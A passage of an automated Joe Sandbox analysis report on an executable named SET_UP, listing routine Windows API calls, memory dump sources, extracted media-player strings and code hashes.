                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,00000000,?,?,00000001,?,?,?), ref: 00409FD9
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 0040A01D
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 0040A073
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?,?), ref: 0040A161
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?,?), ref: 0040A1BE
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?,?), ref: 0040A20F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$CopyDrawImageList_$Inflate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4227890606-0
                                                                                                                                                                                                  • Opcode ID: b0efb927cd3436fa5fd80904f58b3c1d78bcdf80f6780aefdee4b746a66a05db
                                                                                                                                                                                                  • Instruction ID: 92020e2eecfb7317819433571d001b429f2b29006b06b49c862b72495a03d568
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0efb927cd3436fa5fd80904f58b3c1d78bcdf80f6780aefdee4b746a66a05db
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52D14E72900209AFDF04CFA8C989AEEB7B5FF48310F14817AF915AB291D775AD50CB64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,004DE718,00000001,004DE718,00000001,00000000,-00000004,00000001,?,004A534E,0049B51F,00000000,?,?,0049B392), ref: 004A8B02
                                                                                                                                                                                                  • CompareStringA.KERNEL32(00000000,00000000,0050924C,00000001,0050924C,00000001,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8B1F
                                                                                                                                                                                                  • CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,0049B392,?,00000000,-00000004,00000001,?,004A534E,0049B51F,00000000,?,?,0049B392), ref: 004A8B7D
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,00000000,00000000,-00000004,00000001,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8BCE
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8C4D
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8CAE
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,0049B392,?,00000000,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8CC1
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0049B392,?,?,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8D0D
                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8D25
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharCompareMultiStringWide$Info
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1651298574-0
                                                                                                                                                                                                  • Opcode ID: 91f13f7c9b146f374f97c61e1520f3a46ab4c5bdd4a1d637144c00780d7c1f48
                                                                                                                                                                                                  • Instruction ID: bf659344a960f430bd7b4477a42148c72f6b8ff99e55e546d8c3e034bb9895f9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91f13f7c9b146f374f97c61e1520f3a46ab4c5bdd4a1d637144c00780d7c1f48
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C671BFB2900249AFDF219F548C859EF7FB5EB26354F14002FF950A6260DB399C51DB68
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • keyword length must be 1 - 79 characters, xrefs: 00481354
                                                                                                                                                                                                  • extra interior spaces removed from keyword, xrefs: 0048131C
                                                                                                                                                                                                  • Zero length keyword, xrefs: 00481337
                                                                                                                                                                                                  • invalid keyword character 0x%02X, xrefs: 00481259
                                                                                                                                                                                                  • zero length keyword, xrefs: 0048137B
                                                                                                                                                                                                  • leading spaces removed from keyword, xrefs: 004812BC
                                                                                                                                                                                                  • trailing spaces removed from keyword, xrefs: 00481295
                                                                                                                                                                                                  • Out of memory while procesing keyword, xrefs: 0048121D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: Out of memory while procesing keyword$Zero length keyword$extra interior spaces removed from keyword$invalid keyword character 0x%02X$keyword length must be 1 - 79 characters$leading spaces removed from keyword$trailing spaces removed from keyword$zero length keyword
                                                                                                                                                                                                  • API String ID: 1659193697-1527206911
                                                                                                                                                                                                  • Opcode ID: 5de0042efd6f438436a9aafe143c22658e2568d88d5476f359e8edae073ae5cb
                                                                                                                                                                                                  • Instruction ID: d607f5cd755e10ddc6d6cf3c1b1c56616c890e7ef7e648725b2c6274c0aeb7a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de0042efd6f438436a9aafe143c22658e2568d88d5476f359e8edae073ae5cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61518B615082854EE7207A299C817BFBB9DDFA6304F14089FECC497353E71E584783BA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004ACFE7
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0050CEA0), ref: 004ACFF4
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0050CEA0), ref: 004AD03C
                                                                                                                                                                                                  • CallNextHookEx.USER32(00000000,?,?,?), ref: 004AD053
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0050CEA0), ref: 004AD06E
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004AD0B2
                                                                                                                                                                                                  • SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 004AD0D9
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004AD141
                                                                                                                                                                                                  • CallNextHookEx.USER32(?,?,?,?), ref: 004AD17E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1151315845-0
                                                                                                                                                                                                  • Opcode ID: 9db34d6927e4a001b014c5feffa016a50dc01a87ea5c3e8cd0c9f43cd39576ea
                                                                                                                                                                                                  • Instruction ID: 65dbdf464b597f01950311a6373fc1a4e60cc255b96ac45d809af6f6ba383759
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9db34d6927e4a001b014c5feffa016a50dc01a87ea5c3e8cd0c9f43cd39576ea
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3141E271904301AFD710DF11EC85E6B7BA9FB67758F04012AFD0683691D778A84ACBAA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetKeyState.USER32(00000001), ref: 004BC950
                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004BC96E
                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004BC97B
                                                                                                                                                                                                  • GetCapture.USER32 ref: 004BC9CB
                                                                                                                                                                                                    • Part of subcall function 004B57CE: IsWindowEnabled.USER32(?), ref: 004B57D8
                                                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 004BCA15
                                                                                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 004BCA21
                                                                                                                                                                                                  • IsChild.USER32(?,00000000), ref: 004BCA36
                                                                                                                                                                                                  • KillTimer.USER32(?,0000E001), ref: 004BCA7C
                                                                                                                                                                                                  • KillTimer.USER32(?,0000E000), ref: 004BCA99
                                                                                                                                                                                                    • Part of subcall function 004B40D2: GetForegroundWindow.USER32(00000000,?,004BC9A7), ref: 004B40D6
                                                                                                                                                                                                    • Part of subcall function 004B40D2: GetLastActivePopup.USER32(?), ref: 004B40EE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1383385731-0
                                                                                                                                                                                                  • Opcode ID: 1ef7cde573e895071a388ef560c9d35854c41d435042296ff5ca0cfa2670bb87
                                                                                                                                                                                                  • Instruction ID: 93482641ce24bdbc3448831960157b53e83527a1d56080e1fde28f1df50a6ebb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ef7cde573e895071a388ef560c9d35854c41d435042296ff5ca0cfa2670bb87
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03419030600609EFDB21DF65CCC8BEEB7B5AB44754F20466AE461D72A0EB38DD018B68
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,?,?,00406FCB,00000001,00000000,00000000,00000206,?,00000000,00000000,?), ref: 00410C50
                                                                                                                                                                                                  • GetFocus.USER32 ref: 00410C89
                                                                                                                                                                                                    • Part of subcall function 004B2F30: UnhookWindowsHookEx.USER32(?), ref: 004B2F55
                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 00410CC9
                                                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00410CE1
                                                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(00000000,?), ref: 00410D10
                                                                                                                                                                                                  • GetSaveFileNameW.COMDLG32(00000000,?), ref: 00410D1E
                                                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00410D3C
                                                                                                                                                                                                  • IsWindow.USER32(?), ref: 00410D42
                                                                                                                                                                                                  • SetFocus.USER32(?), ref: 00410D50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3606897497-0
                                                                                                                                                                                                  • Opcode ID: 5194c71222fdfb465dc0cf7bb3ee08d124c6cb766859f31db52a4ef58b45ef11
                                                                                                                                                                                                  • Instruction ID: 5d2738cb76d04dc6160773a7b9f40ed57a1d595764b959a15ed6090cb5796c63
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5194c71222fdfb465dc0cf7bb3ee08d124c6cb766859f31db52a4ef58b45ef11
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E3196702102085BDB597B67D95AEAE7A95AF40704B01412FF4058B2A3EFBDD8C1CB9D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0050CEA0,?,004ABE5F), ref: 004ACA06
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA42
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA5D
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA70
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA83
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA96
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACAA9
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACABC
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0050CEA0,?,004ABE5F), ref: 004ACACD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3843206905-0
                                                                                                                                                                                                  • Opcode ID: 53ac8c47efd1981150afe562d5c9a60db11ac1239146de7b33364a4cc96956ed
                                                                                                                                                                                                  • Instruction ID: bae0785ec3325775c506364e0daae8710526ff06e5b4e06b668758d4c965c0d2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53ac8c47efd1981150afe562d5c9a60db11ac1239146de7b33364a4cc96956ed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3711126A84061985D7576B54EC887AD3EBDB72B304F044616E500477F0D7F858CAEBA8
APIs
• __EH_prolog.LIBCMT ref: 0041134A
• CopyRect.USER32(?,?), ref: 00411393
• CreateCompatibleDC.GDI32(00000000), ref: 004113B8
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 004113E7
• BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 00411453
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CompatibleCreate$BitmapCopyH_prologRect
• String ID: <L$VGL
• API String ID: 3403178391-514139165
• Opcode ID: ff8a69070323d55764cd9cb20b4288b8650e5e1f09be077be79c4f9b9e599b94
• Instruction ID: 3e3b3e0d1e25e7034d1c0a4fc99d03218873bff8ba5cda314d9e6ddeb1b84aa6
• Opcode Fuzzy Hash: ff8a69070323d55764cd9cb20b4288b8650e5e1f09be077be79c4f9b9e599b94
• Instruction Fuzzy Hash: A7419272900209EFDF04DFE9C985EEEBBB4EF18304F14451AFA11A72A5D7789941CB64
APIs
• SendMessageW.USER32(?,00000418,00000000,0000FFFF), ref: 004351EA
• FindResourceW.KERNEL32(00000000,000000A2,PNG,00000004,00000000,?,00000003), ref: 0043520D
  • Part of subcall function 0043D300: SizeofResource.KERNEL32(?,?,00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D328
  • Part of subcall function 0043D300: LoadResource.KERNEL32(?,?,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D332
  • Part of subcall function 0043D300: LockResource.KERNEL32(00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D33D
• FindResourceW.KERNEL32(00000000,000000A1,PNG,00000004,00000000,00000000,?,00000003), ref: 0043522A
  • Part of subcall function 004112F3: IsWindow.USER32(?), ref: 0041132A
  • Part of subcall function 004112F3: InvalidateRect.USER32(?,00000000,00000001,?,00435284,?), ref: 0041133B
  • Part of subcall function 004B0798: SendMessageW.USER32(?,00000432,00000000,?), ref: 004B07DB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Resource$FindMessageSend$InvalidateLoadLockRectSizeofWindow
• String ID: $Open Files$Open video/audio files$PNG
• API String ID: 2188223922-3478177462
• Opcode ID: e3b40afe1637b0f385a840ebe8790a87a3ddbeeee2eae5a52ef2b0c74ac21519
• Instruction ID: 3a1d952d9f896af2287592f14e437821dbc1cd17136e019cab42f69a1694552b
• Opcode Fuzzy Hash: e3b40afe1637b0f385a840ebe8790a87a3ddbeeee2eae5a52ef2b0c74ac21519
• Instruction Fuzzy Hash: 2A210870A40304BACB209BA68C41FEFF7BCAF95704F00056F7611A22D1D7B89504CA79
APIs
• __EH_prolog.LIBCMT ref: 00430DF9
• PathFileExistsW.SHLWAPI(?), ref: 00430E09
• GetPrivateProfileIntW.KERNEL32(Playlist,NumberOfEntries,000000FF,?), ref: 00430E23
• GetPrivateProfileStringW.KERNEL32(Playlist,?,00508FBC,?,00000400,?), ref: 00430E7F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: PrivateProfile$ExistsFileH_prologPathString
• String ID: File%d$NumberOfEntries$Playlist
• API String ID: 2426676720-2421212926
• Opcode ID: 1716cd1f10a237ca6941d5bebb9dcdd419871e33a4b632f9f75e0c9706388f79
• Instruction ID: 86d668bcf87f34a5bd15cd450bff3039f659b322d54ca170f9b196b8c692136c
• Opcode Fuzzy Hash: 1716cd1f10a237ca6941d5bebb9dcdd419871e33a4b632f9f75e0c9706388f79
• Instruction Fuzzy Hash: 7B21B631A00109ABCB00EFA1DC55EEF7B74BF04314F10463AF411E21E0DB789A08CB59
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog
• String ID: animated-image$audio$caption$image$subtitle$video
• API String ID: 3519838083-3068980797
• Opcode ID: 6414545abf526197e18e1c2e4d337d83d2242684b4adacf41b65481a65910648
• Instruction ID: 78d9934296f9b80b121ebc51943af85c43efef5598c77543162dbb6fbb86e003
• Opcode Fuzzy Hash: 6414545abf526197e18e1c2e4d337d83d2242684b4adacf41b65481a65910648
